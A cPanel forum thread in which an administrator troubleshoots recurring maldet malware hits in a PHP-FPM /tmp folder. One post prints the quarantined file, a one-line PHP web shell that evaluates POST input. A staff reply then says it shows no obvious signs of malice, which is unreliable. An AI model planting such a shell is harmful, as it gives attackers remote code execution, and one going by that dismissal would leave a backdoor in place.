Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Malware tmp folder

Discussion in 'Security' started by DjordjeB, Dec 21, 2017.

Tags:
  1. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    I get this from maldet one in month. Any one now what is this? If is dangerous how to prevent?
    I have last cPanel (no 3rd party software) and last kernel so system is updated.

    FILE HIT LIST:
    {HEX}php.malware.fopo.538 : /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm => /usr/local/maldetect/quarantine/phpYRhpBm.706132374
     
  2. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,888
    Likes Received:
    90
    Trophy Points:
    78
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hi,

    Check which user has uploaded this file. The user data may be infected causing this to occur..

    # ls -l /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
    OR
    check the maldet session logs to check when it was quarantined and what process recalled it..
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    Let us know if the previous post helps. Note that Maldet is a third-party application, so you may want to reach out to a system administrator for additional assistance if you don't receive additional user-feedback on this thread:

    System Administration Services | cPanel Forums

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Hello, thank you for answer. Session log show only what is in report i check it with "maldet -l".
    That folder don't exist because i have enabled quarantine so message is: No such file or directory.
    Any other suggestions?
     
  5. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    Does the file exist in the /usr/local/maldetect/quarantine directory? If so, you could view the file to verify it's contents to see if it's legitimate. Note, if it's detecting "/usr/lib/systemd/system/ea-php56-php-fpm.service", here's how the contents of that file should look:

    Code:
    # cat /usr/lib/systemd/system/ea-php56-php-fpm.service
    [Unit]
    Description=The PHP FastCGI Process Manager
    After=syslog.target network.target network-online.target
    
    [Service]
    Type=notify
    PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
    EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
    ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
    ExecReload=/bin/kill -USR2 $MAINPID
    PrivateTmp=true
    
    [Install]
    WantedBy=multi-user.target
    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Actually no, in quarantine there is no file/folders like that. I will check next time (because it happens couple times in month) directly in quarantine and update this threads.
     
  7. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Hello. content of one of them is:
    Code:
    8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>
    second:

    Code:
    # owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
    CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW
    maldet:
    Code:
    maldet(20913): {scan} scan completed on /home/CPANELACCOUNT: files 3076, malware hits 0, cleaned hits 0, time 44s

    Code:
    cat /usr/lib/systemd/system/ea-php56-php-fpm.service
    [Unit]
    Description=The PHP FastCGI Process Manager
    After=syslog.target network.target network-online.target securetmp.service
    
    [Service]
    Type=notify
    PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
    EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
    ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
    ExecReload=/bin/kill -USR2 $MAINPID
    PrivateTmp=true
    LimitNOFILE=infinity
    
    [Install]
    WantedBy=multi-user.target
     
    #7 Gojko, Apr 11, 2018
    Last edited by a moderator: Apr 11, 2018
  8. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    The contents of the /usr/lib/systemd/system/ea-php56-php-fpm.service file that you provided match what I see on a test system. However, I believe you are referring to the contents of the PHP file in the /tmp directory. I don't see any obvious signs of malicious intent based on the information you provided, but you may want to reach out to a system administrator for additional assistance if want a more in-depth investigation:

    System Administration Services | cPanel Forums

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice